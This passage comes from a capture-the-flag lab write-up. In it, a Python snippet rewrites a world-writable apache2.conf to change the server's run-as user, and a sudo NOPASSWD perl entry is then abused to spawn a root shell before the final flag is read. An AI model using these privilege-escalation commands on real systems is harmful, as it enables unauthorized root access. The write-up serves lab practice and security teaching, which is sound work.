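    patched = set_run_as(SAMPLE_CONF, "aarti", "aarti")
    print("after: ", run_as(patched))
    with open("apache2.conf", "w", encoding="utf-8") as fh:  # file to serve to the target
        fh.write(patched)
```

The new User/Group only take effect once Apache restarts, which is why the write-up's server restart mattered; and the whole step exists only because apache2.conf was world-writable, which is the finding to report.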
Escalating to root
- sudo -l shows a NOPASSWD entry for perl:
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt
______ ______ _____ _ _ ______
/\ (_____ \ | ___ \ / ___ \ | | | |(_____ \
/ \ _____) )| | _ | || | | || | | | _____) )
/ /\ \ (_____ ( | || || || | | || | | |(_____ (
| |__| | | || || || || |___| || |___| | | |
|______| |_||_||_||_| \_____/ \______| |_|
IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#